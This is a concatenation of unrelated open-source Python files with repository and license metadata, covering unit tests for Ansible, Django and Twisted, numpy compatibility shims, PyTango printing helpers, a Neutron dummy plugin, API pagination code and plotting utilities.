    'test_openvswitch_db_present_missing_key_on_map': [
        (0, 'openvswitch_db_disable_in_band_true.cfg', None),
        (0, None, None)],
    'test_openvswitch_db_present_stp_enable': [
        (0, 'openvswitch_db_disable_in_band_true.cfg', None),
        (0, None, None)],
}
class TestOpenVSwitchDBModule(TestOpenVSwitchModule):
    """Unit tests for the openvswitch_db module, with ovs-vsctl fully mocked."""

    module = openvswitch_db

    def setUp(self):
        super(TestOpenVSwitchDBModule, self).setUp()
        # Mock out the two AnsibleModule entry points the module uses to talk
        # to the system: command execution and binary lookup.
        self.mock_run_command = (
            patch('ansible.module_utils.basic.AnsibleModule.run_command'))
        self.run_command = self.mock_run_command.start()
        self.mock_get_bin_path = (
            patch('ansible.module_utils.basic.AnsibleModule.get_bin_path'))
        self.get_bin_path = self.mock_get_bin_path.start()

    def tearDown(self):
        super(TestOpenVSwitchDBModule, self).tearDown()
        self.mock_run_command.stop()
        self.mock_get_bin_path.stop()

    def load_fixtures(self, test_name):
        """Wire run_command side effects from test_name_side_effect_matrix."""
        test_side_effects = []
        for s in test_name_side_effect_matrix[test_name]:
            rc = s[0]
            out = load_fixture(s[1]) if s[1] else None
            err = s[2]
            side_effect_with_fixture_loaded = (rc, out, err)
            test_side_effects.append(side_effect_with_fixture_loaded)
        self.run_command.side_effect = test_side_effects
        self.get_bin_path.return_value = '/usr/bin/ovs-vsctl'

    def test_openvswitch_db_absent_idempotent(self):
        # Key already missing: state=absent must change nothing.
        set_module_args(dict(state='absent',
                             table='Bridge', record='test-br',
                             col='other_config', key='disable-in-band',
                             value='True'))
        self.execute_module(test_name='test_openvswitch_db_absent_idempotent')

    def test_openvswitch_db_absent_removes_key(self):
        set_module_args(dict(state='absent',
                             table='Bridge', record='test-br',
                             col='other_config', key='disable-in-band',
                             value='True'))
        self.execute_module(
            changed=True,
            commands=['/usr/bin/ovs-vsctl -t 5 remove Bridge test-br other_config'
                      ' disable-in-band=True'],
            test_name='test_openvswitch_db_absent_removes_key')

    def test_openvswitch_db_present_idempotent(self):
        # Key already set to the requested value: state=present is a no-op.
        set_module_args(dict(state='present',
                             table='Bridge', record='test-br',
                             col='other_config', key='disable-in-band',
                             value='True'))
        self.execute_module(test_name='test_openvswitch_db_present_idempotent')

    def test_openvswitch_db_present_adds_key(self):
        set_module_args(dict(state='present',
                             table='Bridge', record='test-br',
                             col='other_config', key='disable-in-band',
                             value='True'))
        self.execute_module(
            changed=True,
            commands=['/usr/bin/ovs-vsctl -t 5 set Bridge test-br other_config'
                      ':disable-in-band=True'],
            test_name='test_openvswitch_db_present_adds_key')

    def test_openvswitch_db_present_updates_key(self):
        set_module_args(dict(state='present',
                             table='Bridge', record='test-br',
                             col='other_config', key='disable-in-band',
                             value='False'))
        self.execute_module(
            changed=True,
            commands=['/usr/bin/ovs-vsctl -t 5 set Bridge test-br other_config'
                      ':disable-in-band=False'],
            test_name='test_openvswitch_db_present_updates_key')

    def test_openvswitch_db_present_missing_key_on_map(self):
        # A map column without a key is an invalid request: the module fails.
        set_module_args(dict(state='present',
                             table='Bridge', record='test-br',
                             col='other_config',
                             value='False'))
        self.execute_module(
            failed=True,
            test_name='test_openvswitch_db_present_idempotent')

    def test_openvswitch_db_present_stp_enable(self):
        # Non-map column: no key needed; setting it reports a change.
        set_module_args(dict(state='present',
                             table='Bridge', record='test-br',
                             col='stp_enable',
                             value='False'))
        self.execute_module(changed=True,
                            test_name='test_openvswitch_db_present_stp_enable')
| gpl-3.0 |
dfdx2/django | tests/admin_views/test_multidb.py | 23 | 2467 | from unittest import mock
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.models import User
from django.db import connections
from django.test import TestCase, override_settings
from django.urls import reverse
from .models import Book
class Router:
    """Database router that sends every read and write to ``target_db``.

    Tests point the class attribute ``target_db`` at one connection alias at
    a time, so the same requests can be replayed against each database.
    """

    target_db = None

    def db_for_read(self, model, **hints):
        return self.target_db

    def db_for_write(self, model, **hints):
        # Writes are routed exactly like reads.
        return self.db_for_read(model, **hints)
# A stand-alone admin site (independent of the default admin) with only Book
# registered, mounted at /admin/ via the urlpatterns used by ROOT_URLCONF below.
site = admin.AdminSite(name='test_adminsite')
site.register(Book)

urlpatterns = [
    url(r'^admin/', site.urls),
]
@override_settings(ROOT_URLCONF=__name__, DATABASE_ROUTERS=['%s.Router' % __name__])
class MultiDatabaseTests(TestCase):
    """Verify admin add/change/delete views open transactions on the routed DB."""

    multi_db = True

    @classmethod
    def setUpTestData(cls):
        # Create one superuser and one Book per configured database, keyed by
        # the connection alias, so each test can log in and act on any of them.
        cls.superusers = {}
        cls.test_book_ids = {}
        for db in connections:
            Router.target_db = db
            cls.superusers[db] = User.objects.create_superuser(
                username='admin', password='something', email='test@test.org',
            )
            b = Book(name='Test Book')
            b.save(using=db)
            cls.test_book_ids[db] = b.id

    @mock.patch('django.contrib.admin.options.transaction')
    def test_add_view(self, mock):
        for db in connections:
            Router.target_db = db
            self.client.force_login(self.superusers[db])
            self.client.post(
                reverse('test_adminsite:admin_views_book_add'),
                {'name': 'Foobar: 5th edition'},
            )
            # The admin must open its transaction on the routed database.
            mock.atomic.assert_called_with(using=db)

    @mock.patch('django.contrib.admin.options.transaction')
    def test_change_view(self, mock):
        for db in connections:
            Router.target_db = db
            self.client.force_login(self.superusers[db])
            self.client.post(
                reverse('test_adminsite:admin_views_book_change', args=[self.test_book_ids[db]]),
                {'name': 'Test Book 2: Test more'},
            )
            mock.atomic.assert_called_with(using=db)

    @mock.patch('django.contrib.admin.options.transaction')
    def test_delete_view(self, mock):
        for db in connections:
            Router.target_db = db
            self.client.force_login(self.superusers[db])
            self.client.post(
                reverse('test_adminsite:admin_views_book_delete', args=[self.test_book_ids[db]]),
                {'post': 'yes'},
            )
            mock.atomic.assert_called_with(using=db)
| bsd-3-clause |
jayhetee/dask | dask/array/numpy_compat.py | 9 | 1606 | import numpy as np
# numpy.isclose appeared in numpy 1.7; on older numpy expose a stub that
# fails loudly when called instead of raising AttributeError at import time.
try:
    isclose = np.isclose
except AttributeError:
    def isclose(*args, **kwargs):
        raise RuntimeError("You need numpy version 1.7 or greater to use "
                           "isclose.")
# numpy.full appeared in numpy 1.8; provide a fallback built from
# multiply/ones for older versions.
try:
    full = np.full
except AttributeError:
    def full(shape, fill_value, dtype=None, order=None):
        """Our implementation of numpy.full because your numpy is old."""
        # ``order`` cannot be emulated with multiply/ones, so reject it.
        if order is not None:
            raise NotImplementedError("`order` kwarg is not supported upgrade "
                                      "to Numpy 1.8 or greater for support.")
        return np.multiply(fill_value, np.ones(shape, dtype=dtype),
                           dtype=dtype)
# Taken from scikit-learn:
# https://github.com/scikit-learn/scikit-learn/blob/master/sklearn/utils/fixes.py#L84
try:
    # Probe for the old numpy bug where np.divide mishandles the ``dtype``
    # kwarg.  Use the builtin ``float`` here: ``np.float`` was merely an
    # alias for it and has been removed in numpy >= 1.24, where referencing
    # it raises an (uncaught) AttributeError.
    if (not np.allclose(np.divide(.4, 1, casting="unsafe"),
                        np.divide(.4, 1, casting="unsafe", dtype=float))
            or not np.allclose(np.divide(.4, 1), .4)):
        raise TypeError('Divide not working with dtype: '
                        'https://github.com/numpy/numpy/issues/3484')
    divide = np.divide
except TypeError:
    # Divide with dtype doesn't work on Python 3
    def divide(x1, x2, out=None, dtype=None):
        """Implementation of numpy.divide that works with dtype kwarg.

        Temporary compatibility fix for a bug in numpy's version. See
        https://github.com/numpy/numpy/issues/3484 for the relevant issue."""
        x = np.divide(x1, x2, out)
        if dtype is not None:
            x = x.astype(dtype)
        return x
| bsd-3-clause |
tiagocoutinho/PyTango | tango/pytango_pprint.py | 4 | 6400 | # ------------------------------------------------------------------------------
# This file is part of PyTango (http://pytango.rtfd.io)
#
# Copyright 2006-2012 CELLS / ALBA Synchrotron, Bellaterra, Spain
# Copyright 2013-2014 European Synchrotron Radiation Facility, Grenoble, France
#
# Distributed under the terms of the GNU Lesser General Public License,
# either version 3 of the License, or (at your option) any later version.
# See LICENSE.txt for more info.
# ------------------------------------------------------------------------------
"""
This is an internal PyTango module.
"""
__all__ = ("pytango_pprint_init",)
__docformat__ = "restructuredtext"
from ._tango import (StdStringVector, StdLongVector, CommandInfoList,
AttributeInfoList, AttributeInfoListEx, PipeInfoList,
DeviceDataHistoryList,
GroupReplyList, GroupAttrReplyList, GroupCmdReplyList,
DbData, DbDevInfos, DbDevExportInfos, DbDevImportInfos, DbHistoryList,
LockerInfo, DevCommandInfo, AttributeDimension, CommandInfo, PipeInfo,
DeviceInfo, DeviceAttributeConfig, AttributeInfo, AttributeAlarmInfo,
ChangeEventInfo, PeriodicEventInfo, ArchiveEventInfo,
AttributeEventInfo, AttributeInfoEx,
DeviceAttribute, DeviceAttributeHistory, DeviceData, DeviceDataHistory,
DevicePipe, DbDatum, DbDevInfo, DbDevImportInfo, DbDevExportInfo,
DbServerInfo, GroupReply, GroupAttrReply, GroupCmdReply,
DevError, EventData, AttrConfEventData, DataReadyEventData,
TimeVal, DevFailed, CmdArgType)
from .device_server import AttributeAlarm, EventProperties
from .device_server import ChangeEventProp, PeriodicEventProp, ArchiveEventProp
from .device_server import AttributeConfig, AttributeConfig_2
from .device_server import AttributeConfig_3, AttributeConfig_5
try:
import collections.abc as collections_abc # python 3.3+
except ImportError:
import collections as collections_abc
def __inc_param(obj, name):
    """Return True when *name* is a plain data attribute worth printing."""
    if name.startswith('_'):
        return False
    if name in ('except_flags',):
        return False
    # Callables are methods, not struct members.
    return not isinstance(getattr(obj, name), collections_abc.Callable)
def __single_param(obj, param_name, f=repr, fmt='%s = %s'):
    """Format one attribute of *obj* as ``name = value``.

    ``data_type`` values are mapped through ``CmdArgType.values`` so the
    enum label is printed instead of a raw integer.
    """
    param_value = getattr(obj, param_name)
    # Use ``==``: the original ``is 'data_type'`` compared identity with a
    # str literal, which only works by CPython interning accident and is a
    # SyntaxWarning on modern Python.
    if param_name == 'data_type':
        param_value = CmdArgType.values.get(param_value, param_value)
    return fmt % (param_name, f(param_value))
def __struct_params_s(obj, separator=', ', f=repr, fmt='%s = %s'):
    """Join every printable attribute of *obj* into a single string."""
    parts = [__single_param(obj, name, f, fmt)
             for name in dir(obj) if __inc_param(obj, name)]
    return separator.join(parts)
def __struct_params_repr(obj):
    """method wrapper for representing all elements of a struct"""
    # Defaults of __struct_params_s give the single-line ``a = r, b = r`` form.
    return __struct_params_s(obj)
def __struct_params_str(obj, fmt, f=repr):
    """Render every printable attribute of *obj*, one per line."""
    return __struct_params_s(obj, separator='\n', f=f, fmt=fmt)
def __repr__Struct(self):
    """repr(): single-line ``ClassName(member = value, ...)``."""
    class_name = self.__class__.__name__
    return '%s(%s)' % (class_name, __struct_params_repr(self))
def __str__Struct_Helper(self, f=repr):
    """str(): multi-line ``ClassName[...]`` listing with aligned names.

    *f* converts each member value (repr by default, str for the
    "extra" variant).
    """
    attrs = [n for n in dir(self) if __inc_param(self, n)]
    # Right-align names to the longest attribute; plain format when there is
    # nothing to print.  A conditional expression replaces the legacy
    # ``x and a or b`` idiom, which silently misbehaves when ``a`` is falsy.
    fmt = '%%%ds = %%s' % max(map(len, attrs)) if attrs else "%s = %s"
    return '%s[\n%s]\n' % (self.__class__.__name__, __struct_params_str(self, fmt, f))
def __str__Struct(self):
    # Default str() for registered structs: member values shown via repr().
    return __str__Struct_Helper(self, f=repr)
def __str__Struct_extra(self):
    # str() variant where member values are rendered via str() instead of repr().
    return __str__Struct_Helper(self, f=str)
def __registerSeqStr():
    """Install list-like str/repr on the internal Tango sequence types."""
    def _seq_str(self):
        if not self:
            return "[]"
        return "[%s]" % (", ".join(map(repr, self)))

    def _seq_repr(self):
        if not self:
            return "[]"
        return "[%s]" % (", ".join(map(repr, self)))

    sequence_types = (StdStringVector, StdLongVector, CommandInfoList,
                      AttributeInfoList, AttributeInfoListEx, PipeInfoList,
                      DeviceDataHistoryList,
                      GroupReplyList, GroupAttrReplyList, GroupCmdReplyList,
                      DbData, DbDevInfos, DbDevExportInfos, DbDevImportInfos,
                      DbHistoryList)
    for seq_type in sequence_types:
        seq_type.__str__ = _seq_str
        seq_type.__repr__ = _seq_repr
def __str__DevFailed(self):
    """Multi-line rendering of a DevFailed error stack."""
    if isinstance(self.args, collections_abc.Sequence):
        rendered = '\n'.join(map(str, self.args))
        return 'DevFailed[\n%s]' % rendered
    return 'DevFailed[%s]' % (self.args)
def __repr__DevFailed(self):
    # Eval-style repr exposing the wrapped error arguments.
    return 'DevFailed(args = %s)' % repr(self.args)
def __str__DevError(self):
    # Indent continuation lines of the description so it aligns under the
    # ``desc = `` label in the template below.
    desc = self.desc.replace("\n", "\n ")
    s = """DevError[
desc = %s
origin = %s
reason = %s
severity = %s]\n""" % (desc, self.origin, self.reason, self.severity)
    return s
def __registerStructStr():
    """helper method to register str and repr methods for structures"""
    # Registry of every struct type that gets the generic member-listing
    # str/repr; keep this tuple in sync with the imports at the top.
    structs = (LockerInfo, DevCommandInfo, AttributeDimension, CommandInfo,
               DeviceInfo, DeviceAttributeConfig, AttributeInfo, AttributeAlarmInfo,
               ChangeEventInfo, PeriodicEventInfo, ArchiveEventInfo,
               AttributeEventInfo, AttributeInfoEx, PipeInfo,
               DeviceAttribute, DeviceAttributeHistory, DeviceData, DeviceDataHistory,
               DevicePipe, DbDatum, DbDevInfo, DbDevImportInfo, DbDevExportInfo,
               DbServerInfo, GroupReply, GroupAttrReply, GroupCmdReply,
               DevError, EventData, AttrConfEventData, DataReadyEventData,
               AttributeConfig, AttributeConfig_2, AttributeConfig_3,
               AttributeConfig_5,
               ChangeEventProp, PeriodicEventProp, ArchiveEventProp,
               AttributeAlarm, EventProperties)
    for struct in structs:
        struct.__str__ = __str__Struct
        struct.__repr__ = __repr__Struct
    # special case for TimeVal: it already has a str representation itself
    TimeVal.__repr__ = __repr__Struct
    # special case for DevFailed: we want a better pretty print
    # also, because it is an Exception it has the message attribute which
    # generates a Deprecation warning in python 2.6
    DevFailed.__str__ = __str__DevFailed
    DevFailed.__repr__ = __repr__DevFailed
    DevError.__str__ = __str__DevError
def pytango_pprint_init(doc=True):
    """Install pretty-print helpers on sequence and struct types.

    The *doc* flag is part of the common PyTango init-hook signature and is
    unused here.
    """
    __registerSeqStr()
    __registerStructStr()
| lgpl-3.0 |
antonioUnina/neutron | neutron/tests/unit/dummy_plugin.py | 41 | 4644 | # Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.api import extensions
from neutron.api.v2 import base
from neutron.common import exceptions
from neutron.db import servicetype_db
from neutron.extensions import servicetype
from neutron import manager
from neutron.openstack.common import uuidutils
from neutron.plugins.common import constants
from neutron.services import service_base
# Identifiers for the proof-of-concept "dummy" service resource.
DUMMY_PLUGIN_NAME = "dummy_plugin"
RESOURCE_NAME = "dummy"
COLLECTION_NAME = "%ss" % RESOURCE_NAME
# Attribute Map for dummy resource
RESOURCE_ATTRIBUTE_MAP = {
    COLLECTION_NAME: {
        'id': {'allow_post': False, 'allow_put': False,
               'validate': {'type:uuid': None},
               'is_visible': True},
        'name': {'allow_post': True, 'allow_put': True,
                 'validate': {'type:string': None},
                 'is_visible': True, 'default': ''},
        'tenant_id': {'allow_post': True, 'allow_put': False,
                      'required_by_policy': True,
                      'is_visible': True},
        'service_type': {'allow_post': True,
                         'allow_put': False,
                         'validate': {'type:servicetype_ref': None},
                         'is_visible': True,
                         'default': None}
    }
}
class Dummy(object):
    # Extension descriptor consumed by Neutron's extension framework; the
    # classmethods below return the metadata it introspects.

    @classmethod
    def get_name(cls):
        return "dummy"

    @classmethod
    def get_alias(cls):
        return "dummy"

    @classmethod
    def get_description(cls):
        return "Dummy stuff"

    @classmethod
    def get_namespace(cls):
        return "http://docs.openstack.org/ext/neutron/dummy/api/v1.0"

    @classmethod
    def get_updated(cls):
        return "2012-11-20T10:00:00-00:00"

    @classmethod
    def get_resources(cls):
        """Returns Extended Resource for dummy management."""
        # Look up the running DUMMY service plugin and expose its CRUD
        # operations through a generic REST controller.
        q_mgr = manager.NeutronManager.get_instance()
        dummy_inst = q_mgr.get_service_plugins()['DUMMY']
        controller = base.create_resource(
            COLLECTION_NAME, RESOURCE_NAME, dummy_inst,
            RESOURCE_ATTRIBUTE_MAP[COLLECTION_NAME])
        return [extensions.ResourceExtension(COLLECTION_NAME,
                                             controller)]
class DummyServicePlugin(service_base.ServicePluginBase):
    """This is a simple plugin for managing instances of a fictional 'dummy'
    service. This plugin is provided as a proof-of-concept of how
    advanced service might leverage the service type extension.
    Ideally, instances of real advanced services, such as load balancing
    or VPN will adopt a similar solution.
    """
    supported_extension_aliases = ['dummy', servicetype.EXT_ALIAS]
    agent_notifiers = {'dummy': 'dummy_agent_notifier'}

    def __init__(self):
        self.svctype_mgr = servicetype_db.ServiceTypeManager.get_instance()
        # In-memory store: dummy id -> dummy resource dict.
        self.dummys = {}

    def get_plugin_type(self):
        return constants.DUMMY

    def get_plugin_name(self):
        return DUMMY_PLUGIN_NAME

    def get_plugin_description(self):
        return "Neutron Dummy Service Plugin"

    def get_dummys(self, context, filters, fields):
        # Return a real list: on Python 3 dict.values() is a lazy view,
        # whereas the API layer expects the list that Python 2 returned.
        return list(self.dummys.values())

    def get_dummy(self, context, id, fields):
        try:
            return self.dummys[id]
        except KeyError:
            raise exceptions.NotFound()

    def create_dummy(self, context, dummy):
        """Store a new dummy and bump its service type's refcount."""
        d = dummy['dummy']
        d['id'] = uuidutils.generate_uuid()
        self.dummys[d['id']] = d
        self.svctype_mgr.increase_service_type_refcount(context,
                                                        d['service_type'])
        return d

    def update_dummy(self, context, id, dummy):
        # Updates are intentionally a no-op in this proof of concept.
        pass

    def delete_dummy(self, context, id):
        """Remove a dummy and release its service type reference."""
        try:
            svc_type_id = self.dummys[id]['service_type']
            del self.dummys[id]
            self.svctype_mgr.decrease_service_type_refcount(context,
                                                            svc_type_id)
        except KeyError:
            raise exceptions.NotFound()
| apache-2.0 |
bonitadecker77/python-for-android | python-modules/twisted/twisted/web/test/test_resource.py | 53 | 4638 | # Copyright (c) 2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.web.resource}.
"""
from twisted.trial.unittest import TestCase
from twisted.web import error
from twisted.web.http import NOT_FOUND, FORBIDDEN
from twisted.web.resource import ErrorPage, NoResource, ForbiddenResource
from twisted.web.test.test_web import DummyRequest
class ErrorPageTests(TestCase):
    """
    Tests for L{ErrorPage}, L{NoResource}, and L{ForbiddenResource}.
    """
    # Indirection points so DeprecatedErrorPageTests can rerun these tests
    # against the deprecated twisted.web.error aliases.
    errorPage = ErrorPage
    noResource = NoResource
    forbiddenResource = ForbiddenResource

    def test_getChild(self):
        """
        The C{getChild} method of L{ErrorPage} returns the L{ErrorPage} it is
        called on.
        """
        page = self.errorPage(321, "foo", "bar")
        self.assertIdentical(page.getChild("name", object()), page)

    def _pageRenderingTest(self, page, code, brief, detail):
        # Shared assertion helper: render the page and check the exact HTML
        # body, the response code, and the content-type header.
        request = DummyRequest([''])
        self.assertEqual(
            page.render(request),
            "\n"
            "<html>\n"
            "  <head><title>%s - %s</title></head>\n"
            "  <body>\n"
            "    <h1>%s</h1>\n"
            "    <p>%s</p>\n"
            "  </body>\n"
            "</html>\n" % (code, brief, brief, detail))
        self.assertEqual(request.responseCode, code)
        self.assertEqual(
            request.outgoingHeaders, {'content-type': 'text/html'})

    def test_errorPageRendering(self):
        """
        L{ErrorPage.render} returns a C{str} describing the error defined by
        the response code and message passed to L{ErrorPage.__init__}.  It also
        uses that response code to set the response code on the L{Request}
        passed in.
        """
        code = 321
        brief = "brief description text"
        detail = "much longer text might go here"
        page = self.errorPage(code, brief, detail)
        self._pageRenderingTest(page, code, brief, detail)

    def test_noResourceRendering(self):
        """
        L{NoResource} sets the HTTP I{NOT FOUND} code.
        """
        detail = "long message"
        page = self.noResource(detail)
        self._pageRenderingTest(page, NOT_FOUND, "No Such Resource", detail)

    def test_forbiddenResourceRendering(self):
        """
        L{ForbiddenResource} sets the HTTP I{FORBIDDEN} code.
        """
        detail = "longer message"
        page = self.forbiddenResource(detail)
        self._pageRenderingTest(page, FORBIDDEN, "Forbidden Resource", detail)
class DeprecatedErrorPageTests(ErrorPageTests):
    """
    Tests for L{error.ErrorPage}, L{error.NoResource}, and
    L{error.ForbiddenResource}.
    """
    # Override the factory hooks so the inherited tests exercise the
    # deprecated twisted.web.error aliases instead of twisted.web.resource.
    def errorPage(self, *args):
        return error.ErrorPage(*args)

    def noResource(self, *args):
        return error.NoResource(*args)

    def forbiddenResource(self, *args):
        return error.ForbiddenResource(*args)

    def _assertWarning(self, name, offendingFunction):
        # Each deprecated alias must emit exactly one DeprecationWarning
        # pointing at its twisted.web.resource replacement.
        warnings = self.flushWarnings([offendingFunction])
        self.assertEqual(len(warnings), 1)
        self.assertEqual(warnings[0]['category'], DeprecationWarning)
        self.assertEqual(
            warnings[0]['message'],
            'twisted.web.error.%s is deprecated since Twisted 9.0.  '
            'See twisted.web.resource.%s.' % (name, name))

    def test_getChild(self):
        """
        Like L{ErrorPageTests.test_getChild}, but flush the deprecation warning
        emitted by instantiating L{error.ErrorPage}.
        """
        ErrorPageTests.test_getChild(self)
        self._assertWarning('ErrorPage', self.errorPage)

    def test_errorPageRendering(self):
        """
        Like L{ErrorPageTests.test_errorPageRendering}, but flush the
        deprecation warning emitted by instantiating L{error.ErrorPage}.
        """
        ErrorPageTests.test_errorPageRendering(self)
        self._assertWarning('ErrorPage', self.errorPage)

    def test_noResourceRendering(self):
        """
        Like L{ErrorPageTests.test_noResourceRendering}, but flush the
        deprecation warning emitted by instantiating L{error.NoResource}.
        """
        ErrorPageTests.test_noResourceRendering(self)
        self._assertWarning('NoResource', self.noResource)

    def test_forbiddenResourceRendering(self):
        """
        Like L{ErrorPageTests.test_forbiddenResourceRendering}, but flush the
        deprecation warning emitted by instantiating
        L{error.ForbiddenResource}.
        """
        ErrorPageTests.test_forbiddenResourceRendering(self)
        self._assertWarning('ForbiddenResource', self.forbiddenResource)
| apache-2.0 |
CERNDocumentServer/cds-videos | cds/modules/theme/views.py | 6 | 1189 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""CDS interface."""
from __future__ import absolute_import, print_function
from flask import Blueprint
# Blueprint exposing the CDS theme's templates and static assets; it is
# registered on the Flask application by Invenio's extension machinery.
blueprint = Blueprint(
    'cds',
    __name__,
    template_folder='templates',
    static_folder='static'
)
| gpl-2.0 |
sbg/sevenbridges-python | sevenbridges/meta/collection.py | 1 | 4097 | from sevenbridges.errors import PaginationError, SbgError
from sevenbridges.models.compound.volumes.volume_object import VolumeObject
from sevenbridges.models.compound.volumes.volume_prefix import VolumePrefix
from sevenbridges.models.link import Link, VolumeLink
class Collection(list):
    """
    Wrapper for SevenBridges pageable resources.
    Among the actual collection items it contains information regarding
    the total number of entries available in on the server and resource href.
    """
    # Resource class used to hydrate items of each fetched page; concrete
    # collections must set it (or pass it to __init__).
    resource = None

    def __init__(self, resource, href, total, items, links, api):
        super().__init__(items)
        self.resource = resource
        self.href = href
        self.links = links
        self._items = items
        self._total = total
        self._api = api

    @property
    def total(self):
        # Server reports the total as a string header; normalize to int.
        return int(self._total)

    def all(self):
        """
        Fetches all available items.
        :return: Collection object.
        """
        # Re-fetch the first page, then follow "next" links until the
        # pagination protocol signals the end via PaginationError.
        page = self._load(self.href)
        while True:
            try:
                for item in page._items:
                    yield item
                page = page.next_page()
            except PaginationError:
                break

    def _load(self, url):
        # Fetch one page and wrap it in a new Collection of the same resource.
        if self.resource is None:
            raise SbgError('Undefined collection resource.')
        else:
            response = self._api.get(url, append_base=False)
            data = response.json()
            total = response.headers['x-total-matching-query']
            items = [
                self.resource(api=self._api, **group)
                for group in data['items']
            ]
            links = [Link(**link) for link in data['links']]
            href = data['href']
            return Collection(
                resource=self.resource, href=href, total=total,
                items=items, links=links, api=self._api
            )

    def next_page(self):
        """
        Fetches next result set.
        :return: Collection object.
        """
        for link in self.links:
            if link.rel.lower() == 'next':
                return self._load(link.href)
        raise PaginationError('No more entries.')

    def previous_page(self):
        """
        Fetches previous result set.
        :return: Collection object.
        """
        for link in self.links:
            if link.rel.lower() == 'prev':
                return self._load(link.href)
        raise PaginationError('No more entries.')

    def __repr__(self):
        return (
            f'<Collection: total={self.total}, available={len(self._items)}>'
        )
class VolumeCollection(Collection):
    # Volume listings paginate with opaque continuation links and also carry
    # "prefixes" (folder-like groupings) alongside the items.

    def __init__(self, href, items, links, prefixes, api):
        super().__init__(
            VolumeObject, href, 0, items, links, api)
        self.prefixes = prefixes

    @property
    def total(self):
        # The volume listing API does not report a total; -1 means "unknown".
        return -1

    def next_page(self):
        """
        Fetches next result set.
        :return: VolumeCollection object.
        """
        for link in self.links:
            if link.next:
                return self._load(link.next)
        raise PaginationError('No more entries.')

    def previous_page(self):
        # Volume continuation tokens are forward-only.
        raise PaginationError('Cannot paginate backwards')

    def _load(self, url):
        if self.resource is None:
            raise SbgError('Undefined collection resource.')
        else:
            response = self._api.get(url, append_base=False)
            data = response.json()
            items = [
                self.resource(api=self._api, **group) for group in
                data['items']
            ]
            prefixes = [
                VolumePrefix(api=self._api, **prefix) for prefix in
                data['prefixes']
            ]
            links = [VolumeLink(**link) for link in data['links']]
            href = data['href']
            return VolumeCollection(
                href=href, items=items, links=links,
                prefixes=prefixes, api=self._api
            )

    def __repr__(self):
        return f'<VolumeCollection: items={len(self._items)}>'
| apache-2.0 |
google/brain-tokyo-workshop | WANNRelease/prettyNEAT/vis/lplot.py | 2 | 2027 | """
Laconic plot functions to replace some of the matplotlibs verbosity
"""
from matplotlib import pyplot as plt
import numpy as np
import seaborn as sns
# -- File I/O ------------------------------------------------------------ -- #
def lsave(data, fileName):
  """Write *data* to *fileName* as comma-separated scientific notation."""
  np.savetxt(fileName, data, delimiter=',', fmt='%1.2e')
def lload(fileName):
  """Read back a comma-separated numeric array (see lsave)."""
  loaded = np.loadtxt(fileName, delimiter=',')
  return loaded
# -- Basic Plotting ------------------------------------------------------ -- #
def lplot(*args,label=[],axis=False):
  """Plots an vector, a set of vectors, with or without an x scale
  """
  # NOTE(review): ``label=[]`` is a mutable default argument; safe here only
  # because the list is never mutated — consider ``label=()``.
  # Supports lplot(y) or lplot(x, y); any other arity leaves x/y unset.
  fig, ax = getAxis(axis)
  if len(args) == 1: # No xscale
    x = np.arange(np.shape(args)[1])
    y = args[0]
  if len(args) == 2: # xscale given
    x = args[0]
    y = args[1]
  if np.ndim(y) == 2:
    # One line per column, all sharing the same x.
    for i in range(np.shape(y)[1]):
      ax.plot(x,y[:,i],'-')
    if len(label) > 0:
      ax.legend((label))
  else:
    ax.plot(x,y,'o-')
  # Mirror getAxis's contract: return (fig, ax) when we created the figure,
  # just the ax when the caller supplied one.
  if axis is False:
    return fig, ax
  else:
    return ax
def ldist(x, axis=False):
  """Plots histogram with estimated distribution
  """
  fig, ax = getAxis(axis)
  # Accept either a CSV file name (loaded via lload) or an array.
  if isinstance(x, str):
    vals = lload(x)
  else:
    vals = x
  sns.distplot(vals.flatten(),ax=ax,bins=10)
  #sns.distplot(vals.flatten(),ax=ax,hist_kws={"histtype": "step", "linewidth": 3, "alpha": 1, "color": "g"})
  return ax
def lquart(x,y,label=[],axis=False):
  """Plots quartiles, x is a vector, y is a matrix with same length as x
  """
  if axis is not False:
    ax = axis
    fig = ax.figure.canvas
  else:
    fig, ax = plt.subplots()
  # 25th/50th/75th percentile across columns of y.
  q = np.percentile(y,[25,50,75],axis=1)
  # NOTE(review): these draw via plt.* (the *current* axes), so a caller-
  # supplied ``axis`` is effectively ignored unless it is current — confirm.
  plt.plot(x,q[1,:],label=label) # median
  plt.plot(x,q[0,:],'k:',alpha=0.5)
  plt.plot(x,q[2,:],'k:',alpha=0.5)
  plt.fill_between(x,q[0,:],q[2,:],alpha=0.25)
  return ax
def getAxis(axis):
  """Return (figure, axes): reuse *axis* when given, else make new ones."""
  if axis is False:
    fig, ax = plt.subplots()
  else:
    ax = axis
    fig = ax.figure.canvas
  return fig, ax
# -- --------------- -- --------------------------------------------#
| apache-2.0 |
srikantbmandal/ansible | lib/ansible/modules/cloud/amazon/iam_server_certificate_facts.py | 77 | 5772 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
